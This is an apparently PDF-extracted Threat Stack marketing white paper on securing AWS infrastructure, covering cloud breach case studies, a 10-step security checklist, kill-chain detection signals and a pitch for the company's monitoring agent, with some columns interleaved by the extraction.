However, the security required for cloud computing demands a much more ... lost if the cloud provider goes out of busine
Implementing high-velocity security best practices.
A STEP-BY-STEP GUIDE TO RUNNING SECURE, COMPLIANT AND OPERATIONALLY EFFICIENT IN AWS.
T H E S TAT E O F C LO U D S EC U R I T Y
Infrastructure has changed It’s no surprise that as more businesses move to the cloud, Infrastructure-as-a-service (IaaS) is growing rapidly along with it. IaaS allows businesses to improve efficiency, reduce risk, tighten controls and lower costs by providing a new, elastic infrastructure that grows and shrinks with the needs of a business. IaaS lets you host all the hardware, software, servers and storage you need. This new infrastructure is consistent and uniform in design and makes deployment, upgrades and maintenance much easier to manage. Amazon Web Services (AWS), the leader in IaaS, offers one of the most flexible and highly scalable cloud-computing platforms on the market today. Its popularity and growing user-base was underscored when it surpassed 1 million visitors in November 2014.[1] However, the security required for cloud computing demands a much more sophisticated, “hands off” approach than that of the traditional on premise data center. For all the benefits the cloud has to offer, there is still a lot of uncertainty around: • The level of security provided by cloud vendors • How to identify and report on lost or stolen data • The best way to gain visibility into who is accessing cloud data and applications
What is your No. 1 issue with security and privacy in public cloud? 30
No. of Responders
23 15 8 0
Insider attack by cloud provider administrators
Multitenant infrastructure means competitors might be able to see my workloads or data
Data may be lost if the cloud service crashes
The cloud service may be unavailable for extended periods
Data may be lost if the cloud provider goes out of business
Unclear liability if there is an attack and loss data
Figure 1: Gartner Cloud Security Survey
Lack of confidence in the cloud provider’s security capabilities
Lack of visibility into who is accessing your data and applications
Governments may have access to my data without my consent
Clouds are attractive targets for hackers, they concentrate risk
02
NEW SECURITY
Challenges
ABOUND
How do you implement security controls in the cloud when you have replaced the network edge with a virtual perimeter, so there is no longer an egress point to deploy your traditional hardware solutions? Cloud-based infrastructure requires modern security and a software-only approach to solve the problem. Traditional intrusion detection/prevention systems (IDS/IPS), unified threat management (UTM) and next generation firewalls that require physical access will not work in this remote environment. Amazon provides and secures the basic infrastructure (locks on data centers, restricted access to hardware, etc.), but it is your responsibility to secure the data that runs on it. Many customers today store critical personal information including healthcare and financial details in files or databases on specific virtual machines. In addition to sensitive customer data, many files contain intellectual property such as proprietary designs or processes. Given the amount of sensitive data saved in the cloud, continuous security monitoring and the ability to contextualize data to provide insight into breaches and potential threat has become essential.
Threats
ARE REAL
As recent news headlines tell us, efforts to protect the cloud from attacks often fail. After attackers compromised the AWS account of Code Spaces, a cloud-based hosting platform that enabled development and collaboration for software teams, it was forced out of business. Within 12 hours, the company’s Apache Subversion repositories and Elastic Block Store volumes and nearly all of its virtual machines were destroyed. By the time the company reclaimed its dashboard, the attackers had created alternative AWS logins, weakening the overall security of the system further. At that point, the company decided its best course of action was to shut down and help its customers migrate any recoverable data to other services. [2] One More Cloud, another hosted provider, fared better. The company had a mislabeled, old API that a third party collaborator may have had access too. For one week, the company struggled to regain control of its dashboard and recover its customer accounts. One More Cloud remains operational today. [3] More recently, the Ashley-Madison data breach demonstrated the danger of storing AWS tokens and SSL certificates in the Cloud without sufficient monitoring systems. This provided the data breach attackers with free rein over the online service and its data. [4] These examples are cautionary tales of the dangers of running fast in the cloud without the proper security measures in place.
03
Understanding
THE MOST COMMON THREATS
The first step to ensureyour company doesn’t meet the same fate as Code Spaces, is to understand the most common threats to your cloud infrastructure:
DATA LOSS / INSID ER T H REAT S
Without proper vigilance and insight, suspicious behavior such as accessing or copying data without permission may go unnoticed. Oftentimes, bad actors are within the organization and may be missed by existing, outward-facing security solutions. In addition to customer records, cloud instances sometimes contain copies of internal configurations. These might include passwords, certifications and encryption keys—the many “keys to the kingdom.” The data breach at Ashley Madison, for example, revealed AWS credentials hard coded into various files. The presence of AWS tokens may have allowed those responsible for the data breach to access all Ashley Madison digital assets, including emails and other sensitive documents. [5] To avoid this, having a record of deep system activity around logins, processes, system activity and file changes can trigger alerts around insider activity.
E XTE RNAL T HR EAT S / Z ERO - DAY AT TAC K S / ADVA NC E D PE R S I S T E NT T HR E AT S
In addition to internal threats, there are external threats as well. However, the external threat today might not be Chinese hackers but people putting up boxes quickly and mis-configuring those virtual machines. Another threat is a side-channel attack. While this is typically done by measuring any meaningful status in hardware, it can also be carried out in the cloud, in this case placing an attacking VM alongside a target VM co-located on the same physical machine. One attack works by flushing the shared cache and then waiting for the target VM to refill it with new data, which the attackers will then steal. Other attacks target the overall integrity of the image in the cloud.
Leaving a port open or escalating a privilege can also expose data in the cloud to malware. According to Symantec, only one in five malware will terminate if it is running on a virtual machine, meaning most malware today will run in the cloud.[6] In 2009, some AWS servers hosted copies of the banking Trojan Zeus before they were shut down.[7] Some threats leverage previously unknown vulnerabilities known as zero-days or launch multiple phases of attacks over time in what’s known as Advanced Persistent Threats (APTs). A recent Ponemon Report finds that diminished brand or reputation due to an APT attack could cost an organization an estimated $9.4 million.[8]
04
A 10-Step Plan
TO BETTER CLOUD SECURITY
How can you stay out of the “cloud security breach” headlines? We’ve compiled a checklist of best practices and key considerations to guard against these attacks in the cloud.
1
INT EGR AT E SEC URIT Y IN TO YOU R CONT INUO US D EP LOYM EN T
6
M A I NTA I N A PO S T U R E O F CO NT I NU O U S COV E R AG E
Embrace security and DevOps best practices by leveraging configuration
To stay on top of your ever changing AWS environment, you need
management tools (Chef, Puppet, Ansible, Salt) that enable automation
continuous data, not random polling. Specifically, you need detection
of software, updates and patches. Make sure your software-defined
up and down the kill chain of any compromise so that you can stop the
security can leverage these tools as well for improved security coverage.
bad activity before it causes too much damage.
2
SCALE WIT HO UT H ARDWARE RES T RAIN T S As you spin up or down new boxes to the cloud, you need
7
TA K E A N I NS I DE - O U T PE R S PEC T I V E If you don’t know what’s happening on a host or workload, you
security that can scale with your business with no additional hardware
need more knowledge from more sources than just an IDS log. For example,
(Amazon Machine Images). You need a security solution that knows
you need to know more than the fact that a certain packet went out
AWS thoroughly, not one ported into the cloud. And preferably, the
over the wire. In order to determine an appropriate response, you need a
solution integrates and auto-scales with AWS.
solution that shows you specific events, over time, on specific servers.
3
D EPLOY INT EL L IG EN T S EC URIT Y T HAT RESPON D S TO C H AN G E
8
PROT EC T AGA I NS T T HE I NS I DE R T HR E AT Should an incident occur, it is important to understand the bad
As threats evolve, your protection needs to be agile and (to prevent
actors – either internal or external. What are the unauthorized process
false positives) contextual. Signature-based protection is static, filtering
connections? Were there any unauthorized installs? And who has been
only what is known, and only effective when it is updated and current.
accessing or copying key files? Prior to the compromise, were there
A better approach is to employ a behavioral-based solution, capable of
abnormal login attempts and failures? Maybe some unauthorized external
identifying new or anomalous activity so you can stay on top of zero-day
connections? Where are unauthorized commands being run? When you
attacks and new behaviors that threaten your security posture.
need to make fact-based judgments you need a trail of logins, processes, network activity and file changes to answer the who, what, where, when and why.
4
GO BEYOND LO G S While logs are essential, they often provide only a narrow
9
G E T A N E A R LY WA R NI NG A B O U T Z E RO DAY T HR E AT S
view of what’s going on. It is one thing to see who is entering and
Zero-day attacks are best detected through behavioral analysis and
leaving the building and quite another to know what they are doing
heuristic testing. Understanding how different events, when taken together,
once they are inside. Typical network-based intrusion detection (HIDS)
might produce an undesirable result is critical to security these days.
doesn’t give you much to work with after the compromise. Typically,
Behavioral analysis can also be used to identify internal threats as well. For
the ability to identify behavior leading up to an attack is limited.
that, you need historical data for both current and transient instances across your AWS infrastructure.
5
ID EN T IFY SU S P IC IO US US ER B EH AVIO R It’s important to catch suspicious user behaviors early. For
example, sometimes developers unintentionally copy files from the
10
DE FE ND L I K E A N AT TAC K E R Apply the Cyber Kill Chain® to your internal security process
to remediate threats before they compromise your security and data.
production server. You need to be informed when such activity occurs and take corrective actions.
05
DEFEND LIKE AN ATTACKER
Apply the Cyber Kill Chain ® Before you solve security in the cloud, you first have to understand how attackers work. You need a solution that maps to and addresses the attack vectors of a breach. You need to think like the bad guys to defeat them.
1
RECO N N A I SSA N C E
Get An Early Warning
Scanning activity Abnormal login attempts/failures Wide open security groups
2
W EA P O N I ZAT I O N
3
D EL I V ERY
Uncover Zero-Day Exploits
Launching new processes, kernel modules User session information Process stops
4
EX P LO I TAT I O N
Recognize Unauthorized Actions Escalation of user privileges Unauthorized installs New users added/deleted Suspicious commands Changes to security groups
5
I N STA L L AT I O N
Detect Advanced Persistent Threats
External connections for command and control User session information Process stops
6
CO MMA N D & CO N T RO L
Verify Data Is Safe
Copying of customer/personal data Copying of intellectual property Copying of internal configuration, passwords, certs and keys
7
ACT I O N O N O B J EC T I V ES
06
A S O LU T I O N B U I LT I N AWS
To Serve AWS
A smarter approach to security in the cloud starts with a solution that autoscales to meet the demands of elastic infrastructure, supports thousands of instances and provides continuous coverage so you can scale with confidence. Threat Stack arms AWS customers with unique and unparalleled visibility into the processes, users and file activity within your infrastructure. Agents monitor all the activity associated with your servers and provides the full details and context that lead to actionable insights around workload security. Threat Stack surfaces previously undiscovered or overlooked information to give you useful alerts and actionable recommendations..
07
HOW DOES
Threat Stack
WORK?
Our lightweight agent installs in the user space of the Linux
Threat Stack brings that rich, contextual data to your fingertips,
operating system. Our agent deploys in minutes using your favorite
along with intelligent, security-relevant analytics gleaned by our
automation software—Chef, Puppet, or Ansible—so security is no
backend.
longer the bottleneck for operational efficiency. The workload security begins the moment the agent is deployed. By residing in the infrastructure level, Threat Stack agents are optimally positioned to oversee system activity and record activity history. Running an agent on the system itself means they capture the really deep information that agentless security solutions simply cannot provide. The data from the underlying Linux kernel is the ultimate authority when it comes to knowing exactly what’s happening in your cloud infrastructure. Threat Stack constantly watches and records deep system activity around logins, processes, system activity and file changes to ensure that nothing out of the ordinary happens without your knowledge. The Threat Stack agent pulls that data from the Linux kernel file system and adds metadata to the events collection. This data is communicated securely to our big data analytics—powered
Figure 2: Threat Stack continuous
backend. There we get to work, peeling back the onion to discover
security monitoring for your cloud.
any suspicious activity.
HOW IS THREAT STACK
Different
FROM SIEM?
Traditional SIEMs only aggregate log data. Additionally, they use
Another advantage of having all that historical data is that in the
signatures to pull out log data that could be the basis for alerts.
event of a compromise, Threat Stack allows you to investigate
Threat Stack also aggregates events, but differs from SIEM by
what was used for the exploit. Similarly, if you have an employee
storing all events and providing a rich context for your analysis.
leave the company, you can go back and see what—if anything— happened leading up to that departure.
In the world of the auto-scaling cloud, machines appear and disappear. Sometimes you need to look back to de-construct
Once deployed, Threat Stack lets you focus on your full-time
the story of what happened. Our “User Session Tracking” feature
job, knowing that it auto-scales with your environment to make
enables you to rewind, zoom in and play back any user’s actions at
sure you are always covered. It’s the perfect security solution for
any point in time, even if the machine no longer exists. Events can
organizations that embrace DevOps in order to rapidly improve
be color-coded for easy reference. And our source and destination
their applications and services.
port tracking allows you to follow a user throughout your network, including through jump hosts. Threat Stack is built to handle the scale and processing power needed to retain this kind of audit history by taking care of the analytics and data retention.
08
Scale Your Business
WITH CONFIDENCE
Infrastructure-as-a-Service (IaaS) is growing rapidly, but cloud computing requires a much more sophisticated security than traditional perimeter-based computing. Cloud-based infrastructure requires modern security and a software-only approach. While Amazon provides and secures the basic infrastructure (locks on data centers, restricted access to hardware, etc.), it is your responsibility to secure the data that runs on it. Today the most common threats to your cloud infrastructure include data loss, insider threats, external threats, zero-day attacks and Advanced Persistent Threats (APTs). Keeping data secure in the cloud requires continuous yet agile monitoring. Also essential is the ability to contextualize data to provide insight into breaches and potential threats. Threat Stack agents are optimally positioned to oversee system activity and record activity history. Like SIEM, Threat Stack aggregates events, but it also stores all events to provide a richer context for your threat analysis. This enables you to re-play events, even from machines that no longer exist. Threat Stack understands that no two companies running in AWS are exactly alike. We’ve designed our service offerings to provide the ultimate in flexibility when selecting a continuous security monitoring solution for your organization. Choose from three application packages (basic, advanced, pro) based on your needs and feature set. Next select a storage option, offered in 2-, 7-, 10-, 15-, and 30day data retention periods. Finally, decide whether you want to manage the service yourself or put Threat Stack’s team of experts to work for you by adding our managed security service, Oversight. Whether you’re a small, early-stage startup, established fast-growing SaaS brand, or a large enterprise transitioning over to the cloud, Threat Stack has you covered every step of the way so you can scale with confidence.
T O L EARN MO RE OR STA RT A FRE E TR IA L Visit ThreatStack.com
[1]
http://www.zdnet.com/article/aws-with-more-than-1-million-active-customers-were-your-stack/.
[2]
http://www.pcworld.com/article/2365602/hacker-puts-full-redundancy-codehosting-firm-out-of-business.html
[3]
http://www.information-age.com/technology/cloud-and-virtualisation/123458406/catastrophe-cloud-what-aws-hacks-mean-cloud-providers
[4]
https://blog.gaborszathmari.me/2015/09/07/credentials-in-the-ashley-madison-sources/
[5]
http://www.pcworld.com/article/2981226/credentials-stored-in-ashley-madisons-source-code-might-have-helped-attackers.html
[6]
http://www.symantec.com/connect/blogs/does-malware-still-detect-virtual-machines
[7]
https://aws.amazon.com/security/security-bulletins/zeus-botnet-controller/
[8]
https://securityintelligence.com/media/2014-ponemon-study-economic-impact-advanced-persistent-threats-apts/
09
